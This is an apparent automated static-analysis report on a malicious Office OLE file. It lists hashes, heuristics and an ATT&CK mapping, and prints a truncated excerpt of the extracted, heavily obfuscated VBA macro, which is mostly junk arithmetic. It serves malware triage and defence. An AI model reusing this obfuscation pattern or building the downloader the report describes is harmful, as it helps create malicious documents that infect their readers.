Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4e4f6462d3f172ea…

MALICIOUS

Office (OLE)

Size: 105.9 KB
First seen: 2019-08-04
MD5:     9c0aed5848e3df57273094cc8acd7140
SHA-1:   902e78d485c91bf6bac146f346f83fbcfdf3abf5
SHA-256: 4e4f6462d3f172eac70c0b73faf094edaaf75a76debd41dc1c7aa2046e908da6
Risk score: 62

Malware Insights

MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic)

The presence of VBA macros and the OLE slack space anomaly indicate a malicious document. The obfuscated VBA code strongly suggests it is designed to download and execute a second-stage payload, though the specific URL or execution method is not directly discernible due to the obfuscation. The embedded URL is benign.

Heuristics (3)

  • [high] OLE_SLACK_ANOMALY: OLE document has a large unaccounted-for region
    The OLE file is 108,444 bytes but its declared streams total only 57,435 bytes; the remaining 51,009 bytes (47%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • [medium] OLE_VBA_MACROS: VBA macros detected
    The document contains VBA macro code.
  • [info] EMBEDDED_URL: Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  4940 bytes
SHA-256: 07168c26c8e8e140d1240af4c9c8178f5a9104551f73d5023b368425191583c4

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "KfVvvOMj"
Private Function zRFtwLHaz()
On Error Resume Next
   wtIzFM = 64115 + vSErW * cnOJva + 91536 / MwsYi - wAhHv / 57645 * 95603 * 62440 / dUrjvz
   ckYuu = zazTjF / cXDWM / 16403 * AjbwP + 34005 / NRPYw + (FwmKBL / zLPiKj - wPZoj - rOwIc / dElJhu - YzfktV)
   OLYQui = 36714 + wrYhJE * hjWvlw + 92015 / uvHlpE - zbhPdN / 12313 * 69472 * 3369 / OOzmY
   BJnoCa = 79074 + zrKSLl * GvsitJ + 94278 / Qwana - DQOtw / 74806 * 12157 * 64951 / sitcp
   YnKCZ = 4343 + mTSiUm * dpErwA + 89175 / TawUZX - wGVwmN / 4030 * 87694 * 78594 / ZmdKvc
End Function
Private Function oQsmjwawrbp()
On Error Resume Next
   iAozL = cFVTGw / jJsLrU / 50914 * QsCGU + 89854 / OXvsor + (YcWDOv / oDdfnl - Uajzt - NHlqqi / qwYOIF - kQooFi)
   VTpFIw = CAprtv / oPjXkt / 44286 * aHpbZJ + 53963 / oKXAl + (iMCwtH / vCaAo - EUlCD - YthPj / RaoAh - uEqkW)
   GovMhq = FJhWkh / cDDFqS / 21808 * iisPf + 5322 / wRmpNi + (FjBifO / MKCJWE - vQzzT - GRUSKu / KPkuT - fwTEIn)
   oYbhIa = wOsush / qjMjM / 11110 * fPWhAi + 8059 / stOflT + (PJZIw / JVNND - aHbZS - mJJEz / rpKWz - MwzdQC)
   qAihWi = LChoYK / RifSi / 9195 * ajPqw + 62365 / nSFEGi + (fGLwS / PmiENV - ITLIHZ - QUOrY / JXjck - cMlYT)
   InVuJ = zPiiQ / wRwJD / 20921 * RRHrn + 41846 / AGVwqZ + (PFznP / fKcLfG - jvznaG - pmBviY / Tquhnq - hLzWn)
End Function
Private Function iUIDnztcLkzAH()
On Error Resume Next
   rtzdfD = 68366 + SomMn * CVhpKG + 16871 / mFXrk - WKKXN / 15933 * 7689 * 40797 / DMkvE
   QwmqCB = 65811 + MUKiW * lZPbA + 76711 / bWljON - jXlLqM / 66094 * 51272 * 77102 / VEvIi
   nTAKAV = 98468 + RDWDl * ifWziY + 37209 / zzZaG - GdQuh / 98853 * 93745 * 38543 / qSLnH
   AlGlI = 28529 + LzBip * sFnSi + 87876 / iPwfm - GidZLE / 22959 * 45246 * 9493 / lzwHtz
   dONWz = 46933 + QKhkl * awaImi + 44877 / adknSB - hmOfo / 75178 * 3210 * 46165 / kjEHv
End Function
Private Function PiiEPbkAXsDITl()
On Error Resume Next
   pjolwC = imYUw / chjOE / 55865 * mJaIzY + 39948 / zkToK + (HhtYfc / SPXXkN - lMRMFs - jJjlZ / pjBEfl - UzqpYA)
   tCkOL = jlSHj / UbYNn / 12362 * zmNSrw + 44157 / lWcnEt + (mGvWOJ / vjzwT - tadCS - Bjfkt / owzOq - fYjoS)
   zzWWb = auVEFj / TwQOD / 9 * OcAFpR + 5452 / zYCJrm + (ZwRXiH / jKVAjE - muQlXp - wRhJd / zzBvsh - YSwfRi)
   slqri = vfAhL / ZVwsHH / 43280 * GZMJj + 84973 / RvpFIL + (aUKoBP / lnPlVR - jjYhvQ - SZhLm / ijLcCh - vdhSGH)
End Function
Private Function dTmAsLVWqbUd(mcChsEmnHArif)
On Error Resume Next
   TKKnWw = (59171 + QKzZin / USbDPZ + hitAQO / 39566 / QjFbUV) / 32698 + fNiMC + GQEZLO * 72834
   KbhkP = (32176 + NubHv / dOYTBb + jodCCw / 11616 / oMofbK) / 2802 + JtTuD + nMniEp * 83629
   Lmdbt = (40576 + QNXuNT / SGDww + kNizcd / 93603 / DGICvl) / 30032 + rpcKfO + fpswwG * 8778
   wiwHj = (99108 + YpMGO / ShrkPN + mJWOw / 14500 / jzkwvS) / 72309 + DRaLpL + qBrQwa * 28806
End Function
Private Function iaFwDGZsLNOEiR()
On Error Resume Next
   YpMNO = (1686 + lYpPNw / QiczmS + GJncmL / 73443 / honzKL) / 3570 + qjXrnv + dTEvco * 81958
   QURfY = (70134 + oKurAb / ohOmm + PbCLV / 18225 / iQJBq) / 54273 + jpuWW + HijtD * 76511
   YzQTM = (23861 + qGAjWm / GhmLR + bzJIXt / 67720 / AaDZQ) / 45805 + SBdWRA + zJPoZ * 98077
   SOfRq = (39540 + tklWzi / vHiFTH + FBDajT / 83472 / zRQRw) / 67269 + bDFKzL + SjaJQ * 35149
   WEAcwZ = (78771 + vTdHq / zKGOan + JpAfNA / 99631 / iUkrHD) / 97315 + nYTdt + DosXTL * 9203
End Function
Private Function lTjmvuXZitj()
On Error Resume Next
   RoWwZ = (66523 + WIRtiB / aLVjvV + WiWNb / 91120 / ZllCH) / 45005 + WFzOU + SrvKP * 41530
   jnCjN = (5741 + GzlwnM / WjqXid + GYSaA / 7125 / mMzFdB) / 80773 + jStUWP + LPhIV * 39061
   RhAhNV = (65497 + PsZwFY / zrDWZ + wiWvZ / 6364 / utjCA) / 59897 + Wqijb + iFlnk * 94070
   EpisTC = (16921 + GZpCA / LkQMj + biHkca / 56201 / ThDqL) / 93369 + mYUdMj + fuqju * 50689
   rsqDm = (53177 + wdloS / zWLWv + HwIMUv / 40169 / qziKcw) / 77368 + ApzND + XNsvJj * 60723
End Function
Private Function zVfoMjIYQjYFO()
On Error Resume Next
   pwLwV = (54399 + AjHfrP / XAYXTO + ikwunA / 93228 / QNYCou) / 10658 + BHwcZr + UlpitI * 81499
   jQ
... (truncated)